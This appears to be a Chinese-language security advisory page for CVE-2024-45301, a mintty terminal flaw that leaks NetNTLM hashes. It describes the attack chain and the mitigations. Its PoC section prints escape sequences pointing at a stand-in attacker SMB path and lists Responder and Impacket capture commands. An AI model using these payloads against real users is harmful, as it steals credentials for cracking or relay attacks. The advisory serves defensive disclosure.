IPBUF安全漏洞报告
English
CVE-2024-45301 CVSS 5.3 中危

CVE-2024-45301 Mintty终端模拟器NetNTLM哈希泄露漏洞

披露日期: 2025-11-12
来源: [email protected]

漏洞信息

漏洞编号
CVE-2024-45301
漏洞类型
信息泄露
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Mintty (Cygwin/MSYS/WSL终端模拟器)

相关标签

信息泄露NetNTLM哈希泄露终端模拟器MinttyCygwinMSYSWSLPass the HashNTLM转义序列

漏洞概述

CVE-2024-45301是mintty终端模拟器中的一个安全漏洞。Mintty是一款广泛应用于Cygwin、MSYS和WSL环境的终端模拟器。该漏洞存在于版本2.3.6至3.7.4中,攻击者可以通过在终端上打印特定的转义序列(escape sequences)来触发漏洞。这些转义序列会导致mintty进程尝试访问攻击者指定的任意网络路径(UNC路径),从而触发Windows系统与攻击者控制的远程主机进行NTLM认证协商。由于mintty在处理这些转义序列时未对网络路径访问进行充分的安全限制,攻击者可以截获受害者的NetNTLMv2哈希值。攻击者随后可以使用hashcat等密码破解工具或直接利用这些哈希值进行Pass the Hash攻击,从而获取受害系统的访问权限。此漏洞的CVSS评分为5.3,属于中等严重程度,主要影响机密性。攻击需要用户交互(用户需要在终端中查看或执行包含恶意转义序列的内容),但不需要认证即可发起攻击。

技术细节

该漏洞的利用基于mintty终端模拟器对特定转义序列的不当处理。当mintty进程接收到包含文件访问请求的转义序列时,它会尝试解析并访问序列中指定的路径。攻击者构造包含恶意UNC路径(如\\attacker\share)的转义序列,当用户在bash或其他shell中输出这些序列时,mintty会触发Windows SMB连接尝试访问该路径。这一行为导致Windows系统自动向攻击者控制的远程SMB服务器发送NetNTLMv2认证挑战和响应。攻击者可以搭建恶意的SMB服务器(如使用Responder或Impacket工具)来捕获这些哈希值。由于Windows系统的NTLM认证机制设计,捕获的哈希值可以用于离线破解或直接的中继攻击。攻击成功的关键在于mintty未对转义序列中的路径进行安全验证,允许访问任意网络路径而非仅限于本地文件系统。攻击者利用此漏洞可以绕过防火墙限制,通过用户触发的终端输出来获取受害者的认证凭据。

攻击链分析

STEP 1
步骤1
攻击者搭建恶意SMB服务器(如使用Responder或Impacket),配置为监听并捕获NetNTLMv2哈希值
STEP 2
步骤2
攻击者构造包含恶意UNC路径的mintty转义序列,如\x1b]8;;\\attacker\share\a
STEP 3
步骤3
攻击者通过钓鱼邮件、恶意文档、恶意网站或其他方式诱导受害者(使用存在漏洞版本的mintty)在终端中输出该转义序列
STEP 4
步骤4
受害者终端接收到转义序列后,mintty进程触发SMB连接尝试访问攻击者指定的UNC路径
STEP 5
步骤5
Windows系统自动向攻击者的SMB服务器发起NTLM认证协商,发送NetNTLMv2哈希
STEP 6
步骤6
攻击者捕获受害者的NetNTLMv2哈希值,使用hashcat进行离线暴力破解或直接进行Pass the Hash攻击
STEP 7
步骤7
攻击者使用破解得到的明文密码或哈希值横向移动,获取受害者系统或其他相关系统的访问权限

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2024-45301 PoC - Mintty NetNTLM Hash Leakage # Trigger via escape sequence with malicious UNC path # Attacker setup: Run Responder or Impacket smbserver on attacker machine # PoC escape sequence to trigger SMB connection: evil_escape_seq = "\x1b]8;;\\\\attacker\\share\a" print(evil_escape_seq) # Alternative PoC - More explicit file access escape sequence: # This sequence causes mintty to attempt file access at attacker-controlled path poc_seq2 = "\033]8;;file:///\\\\attacker\\evil\\path\007" print(poc_seq2) # Note: Replace '\\\\attacker\\share' with actual attacker SMB server IP/hostname # On attacker side, use Responder: # sudo python3 Responder.py -I eth0 -v # Or use Impacket smbserver: # impacket-smbserver -smb2support share ./exploit_dir

影响范围

Mintty >= 2.3.6 且 < 3.7.5
Mintty 2.3.6
Mintty 2.3.7
Mintty 2.3.8
Mintty 3.0.0 至 3.7.4

防御指南

临时缓解措施
临时缓解措施:1) 在企业环境中配置组策略禁用出站SMB流量或限制SMB通信到授权服务器;2) 启用Windows Defender防火墙规则阻止445端口的出站连接;3) 启用'Restrict NTLM: Outgoing NTLM traffic to remote servers'策略;4) 提醒用户不要在终端中执行来源不明的命令或脚本;5) 部署网络入侵检测系统监控异常的SMB流量。建议尽快升级到mintty 3.7.5版本以彻底修复该漏洞。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表